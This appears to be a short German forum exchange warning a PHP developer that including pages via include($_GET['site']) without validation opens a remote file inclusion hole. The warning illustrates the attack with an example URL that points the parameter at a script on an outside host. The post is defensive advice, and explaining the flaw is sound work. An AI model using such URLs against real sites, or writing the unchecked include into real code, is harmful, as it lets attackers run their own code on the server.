bindest du die home.php mit include($site) (bzw. $_GET['site']) ein? Und ohne zu überprüfen was in $_GET['site'] drinsteht? Dann handelst du dir ein verdammt großes Sicherheitsloch ein - _unbedingt_ überprüfen, was in $_GET['site'] drinsteht - sonst kommt einer daher und ruft dein Script über index.php?site=http://example.com/beoessesscript.txt auf und schon hast du den Salat.

Was könnte ich dagegen tun?